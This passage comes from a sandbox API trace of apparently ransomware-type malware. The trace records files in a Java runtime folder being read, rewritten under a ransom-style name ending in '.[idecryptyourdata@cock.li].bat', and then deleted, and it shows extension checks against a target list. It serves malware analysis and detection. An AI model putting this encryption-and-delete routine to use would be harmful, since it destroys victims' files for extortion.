nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf2, lpOverlapped=0x0) returned 1 [0197.540] SetEndOfFile (hFile=0x39c) returned 1 [0197.540] CloseHandle (hObject=0x39c) returned 1 [0197.540] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.540] SetEndOfFile (hFile=0x38c) returned 1 [0197.541] CloseHandle (hObject=0x38c) returned 1 [0197.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.541] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe")) returned 1 [0197.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.542] lstrlenW (lpString=".doc") returned 4 [0197.542] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.542] lstrlenW (lpString=".docx") returned 5 [0197.542] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0197.542] lstrlenW (lpString=".pdf") returned 4 [0197.542] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.542] lstrlenW (lpString=".xls") returned 4 [0197.542] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.542] lstrlenW (lpString=".xlsx") returned 5 [0197.542] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0197.542] lstrlenW (lpString=".ppt") returned 4 [0197.542] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.542] lstrlenW (lpString=".zip") returned 4 [0197.542] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.542] lstrlenW (lpString=".rar") returned 4 [0197.542] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.542] lstrlenW (lpString=".bz2") returned 4 [0197.542] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.542] lstrlenW (lpString=".7z") returned 3 [0197.543] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString=".dbf") returned 4 [0197.543] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString=".1cd") returned 4 [0197.543] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString=".jpg") returned 4 [0197.543] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString=".doc") returned 4 [0197.543] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.543] lstrlenW (lpString=".docx") returned 5 [0197.543] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0197.543] lstrlenW (lpString=".pdf") returned 4 [0197.543] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.543] lstrlenW (lpString=".xls") returned 4 [0197.543] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.543] lstrlenW (lpString=".xlsx") returned 5 [0197.543] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0197.543] lstrlenW (lpString=".ppt") returned 4 [0197.543] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.543] lstrlenW (lpString=".zip") returned 4 [0197.543] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.544] lstrlenW (lpString=".rar") returned 4 [0197.544] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.544] lstrlenW (lpString=".bz2") returned 4 [0197.544] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.544] lstrlenW (lpString=".7z") returned 3 [0197.544] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.544] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.544] lstrlenW (lpString=".dbf") returned 4 [0197.544] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.544] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.544] lstrlenW (lpString=".1cd") returned 4 [0197.544] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.544] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 54 [0197.544] lstrlenW (lpString=".jpg") returned 4 [0197.544] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.544] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.544] lstrlenW (lpString="jpeg.dll") returned 8 [0197.544] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.545] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=185920) returned 1 [0197.545] CloseHandle (hObject=0x38c) returned 1 [0197.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll")) returned 0x20 [0197.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.545] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.545] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.545] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.546] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.546] GetLastError () returned 0x0 [0197.546] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x2d640, lpOverlapped=0x0) returned 1 [0197.635] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x2d650, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x2d650, lpOverlapped=0x0) returned 1 [0197.638] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.638] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.639] SetEndOfFile (hFile=0x39c) returned 1 [0197.639] CloseHandle (hObject=0x39c) returned 1 [0197.639] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.639] SetEndOfFile (hFile=0x38c) returned 1 [0197.642] CloseHandle (hObject=0x38c) returned 1 [0197.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.643] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll")) returned 1 [0197.643] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.643] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.643] lstrlenW (lpString=".doc") returned 4 [0197.643] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.643] lstrlenW (lpString=".docx") returned 5 [0197.643] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0197.643] lstrlenW (lpString=".pdf") returned 4 [0197.643] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.643] lstrlenW (lpString=".xls") returned 4 [0197.643] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.643] lstrlenW (lpString=".xlsx") returned 5 [0197.643] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0197.643] lstrlenW (lpString=".ppt") returned 4 [0197.643] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.643] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString=".zip") returned 4 [0197.644] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString=".rar") returned 4 [0197.644] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString=".bz2") returned 4 [0197.644] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.644] lstrlenW (lpString=".7z") returned 3 [0197.644] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.644] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString=".dbf") returned 4 [0197.644] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.644] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString=".1cd") returned 4 [0197.644] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.644] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString=".jpg") returned 4 [0197.644] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.644] lstrlenW (lpString=".doc") returned 4 [0197.644] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString=".docx") returned 5 [0197.644] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0197.644] lstrlenW (lpString=".pdf") returned 4 [0197.644] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString=".xls") returned 4 [0197.644] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.644] lstrlenW (lpString=".xlsx") returned 5 [0197.644] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0197.645] lstrlenW (lpString=".ppt") returned 4 [0197.645] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.645] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.645] lstrlenW (lpString=".zip") returned 4 [0197.645] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.645] lstrlenW (lpString=".rar") returned 4 [0197.645] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.645] lstrlenW (lpString=".bz2") returned 4 [0197.645] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.645] lstrlenW (lpString=".7z") returned 3 [0197.645] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.645] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.645] lstrlenW (lpString=".dbf") returned 4 [0197.645] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.645] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.645] lstrlenW (lpString=".1cd") returned 4 [0197.645] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.645] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 47 [0197.645] lstrlenW (lpString=".jpg") returned 4 [0197.645] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.645] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.645] lstrlenW (lpString="jsoundds.dll") returned 12 [0197.645] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.646] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=31296) returned 1 [0197.646] CloseHandle (hObject=0x38c) returned 1 [0197.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll")) returned 0x20 [0197.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.646] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.646] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.647] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.647] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.647] GetLastError () returned 0x0 [0197.647] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x7a40, lpOverlapped=0x0) returned 1 [0197.772] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x7a50, lpOverlapped=0x0) returned 1 [0197.773] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.773] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.773] SetEndOfFile (hFile=0x39c) returned 1 [0197.774] CloseHandle (hObject=0x39c) returned 1 [0197.774] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.774] SetEndOfFile (hFile=0x38c) returned 1 [0197.775] CloseHandle (hObject=0x38c) returned 1 [0197.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.775] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll")) returned 1 [0197.776] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.776] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.776] lstrlenW (lpString=".doc") returned 4 [0197.776] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString=".docx") returned 5 [0197.776] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.776] lstrlenW (lpString=".pdf") returned 4 [0197.776] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString=".xls") returned 4 [0197.776] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString=".xlsx") returned 5 [0197.776] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.776] lstrlenW (lpString=".ppt") returned 4 [0197.776] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.776] lstrlenW (lpString=".zip") returned 4 [0197.776] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString=".rar") returned 4 [0197.776] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.776] lstrlenW (lpString=".bz2") returned 4 [0197.776] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.776] lstrlenW (lpString=".7z") returned 3 [0197.776] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.776] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.776] lstrlenW (lpString=".dbf") returned 4 [0197.776] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.777] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.777] lstrlenW (lpString=".1cd") returned 4 [0197.777] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.777] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.777] lstrlenW (lpString=".jpg") returned 4 [0197.777] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.777] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.777] lstrlenW (lpString=".doc") returned 4 [0197.777] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString=".docx") returned 5 [0197.777] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.777] lstrlenW (lpString=".pdf") returned 4 [0197.777] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString=".xls") returned 4 [0197.777] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString=".xlsx") returned 5 [0197.777] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.777] lstrlenW (lpString=".ppt") returned 4 [0197.777] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.777] lstrlenW (lpString=".zip") returned 4 [0197.777] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString=".rar") returned 4 [0197.777] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.777] lstrlenW (lpString=".bz2") returned 4 [0197.777] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.777] lstrlenW (lpString=".7z") returned 3 [0197.778] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.778] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.778] lstrlenW (lpString=".dbf") returned 4 [0197.778] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.778] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.778] lstrlenW (lpString=".1cd") returned 4 [0197.778] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.778] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 51 [0197.778] lstrlenW (lpString=".jpg") returned 4 [0197.778] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.779] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.779] lstrlenW (lpString="kinit.exe") returned 9 [0197.779] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.780] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=16448) returned 1 [0197.780] CloseHandle (hObject=0x38c) returned 1 [0197.780] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe")) returned 0x20 [0197.780] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.780] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.781] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.813] GetLastError () returned 0x0 [0197.813] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4040, lpOverlapped=0x0) returned 1 [0197.875] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x4050, lpOverlapped=0x0) returned 1 [0197.876] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.876] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe6, lpOverlapped=0x0) returned 1 [0197.876] SetEndOfFile (hFile=0x39c) returned 1 [0197.877] CloseHandle (hObject=0x39c) returned 1 [0197.877] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.877] SetEndOfFile (hFile=0x38c) returned 1 [0197.879] CloseHandle (hObject=0x38c) returned 1 [0197.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.879] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe")) returned 1 [0197.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.879] lstrlenW (lpString=".doc") returned 4 [0197.879] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.879] lstrlenW (lpString=".docx") returned 5 [0197.879] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0197.879] lstrlenW (lpString=".pdf") returned 4 [0197.879] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.879] lstrlenW (lpString=".xls") returned 4 [0197.880] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.880] lstrlenW (lpString=".xlsx") returned 5 [0197.880] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0197.880] lstrlenW 